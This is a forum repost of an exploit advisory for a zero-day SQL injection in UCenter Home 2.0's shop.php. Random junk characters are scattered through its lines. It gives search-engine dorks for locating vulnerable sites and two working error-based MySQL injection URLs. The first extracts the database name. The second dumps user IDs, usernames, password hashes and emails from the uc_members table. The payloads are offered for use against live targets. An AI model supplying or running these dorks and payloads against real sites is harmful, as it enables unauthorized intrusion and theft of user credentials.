' c- O' W) |1 `( m__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
. n" \8 S' |# W& R7 ~/ ?
' F' c3 V- _7 ^
# x/ S' B# ]( L1 n9 Q# N3 \
9 G( T8 ~2 H8 l' V' `*/ Author : KnocKout ) I3 |) @; }0 b0 S- R1 Q$ C
1 f" j% v' m$ P/ _4 b2 Z. P/ _
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers 8 {; t$ U0 c8 i! }% ]
1 [9 m7 k$ c: K
*/ Contact: knockoutr@msn.com
% ~! W. t$ n, x j3 @* S. q
' ~' p% F& L) O*/ Cyber-Warrior.org/CWKnocKout
+ s' C' n; f7 j& Y7 q
& ^& I1 ~) u5 K% z, L4 `__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
. G- {. G; r/ u8 v/ [; ~" }2 D% e# x
Script : UCenter Home - k0 V. Q3 J' B6 {8 Z7 h. `* b' X# C
0 B/ y4 [9 x6 n7 cVersion : 2.0 ! l( B! [- b/ R' a# d) V4 D' e3 ?
, q0 _8 _) D5 A, ^* T1 D! e: R8 gScript HomePage : http://u.discuz.net/
& r8 j; W! e2 U9 }# I
8 _( X/ K; B: r9 \__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
/ p/ P, N) L( ^* @" ]5 {' T9 Q' \. S2 U% D s! @# e& D2 i4 @2 Q6 \
Dork : Powered by UCenter inurl:shop.php?ac=view
8 M b4 l' c9 u8 ^8 V' J( v* d" Z! I8 \5 E! _
Dork 2 : inurl:shop.php?ac=view&shopid= " S, y3 E5 [* P" I! D/ A
4 h7 v4 o. I9 S' V' c__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== % J' H7 ~ y2 [# w$ Z: f D; }
0 S y2 s4 k4 l C9 q
Vuln file : Shop.php
4 [/ g; q5 D; z
# L6 a5 D7 h8 |. [3 ]value's : (?)ac=view&shopid=
- u& k r: n+ t* R4 H( A
3 O* N6 S; y( I/ K& sVulnerable Style : SQL Injection (MySQL Error Based)
0 I( ^5 W$ O7 u/ n- u2 Y# k% }: j7 ]
Need Metarials : Hex Conversion
2 O2 d- x2 M. m* t" j- r& ~# X" C: C9 I7 A) m, \
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== / U5 |# t' ?3 @# w$ v8 c% r
3 X- ?! N8 `, O# p9 k
Your Need victim Database name. ' I* q; E) n8 P, ~ | J
& l& d+ {2 M1 lfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
l# ?5 U, ]8 F( D( ?1 D6 U. h% l7 ` e$ T
.. 1 b, o+ k. n m
7 H q, U- G8 q
DB : Okey.
2 y8 G- G3 @8 c' Y! F- t8 @
/ N3 w+ m1 _+ @, a5 G2 S: v8 Qyour edit DB `[TARGET DB NAME]` 1 t- J' u5 ?, M' e
2 q2 N* a I. Y. P& ~6 u
Example : 'hiwir1_ucenter'
/ @4 c8 E# B0 g7 y' v x$ i( ?2 t# s8 n( W( E4 L. L
Edit : Okey.
- _4 U1 }8 N% u- b" q: W) | U9 U6 ?9 K/ B
Your use Hex conversion. And edit Your SQL Injection Exploit..
, f* n- P8 c# {+ z! y( s, F) x6 B/ \& y
% V1 L; o9 y* G/ Z& j; [+ P - V8 u, b! [2 [& o
, w4 D9 K2 b# V( {
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
0 s4 r1 M4 `- p* E* q |
发表于 2013-2-27 21:31:31
收藏
支持
反对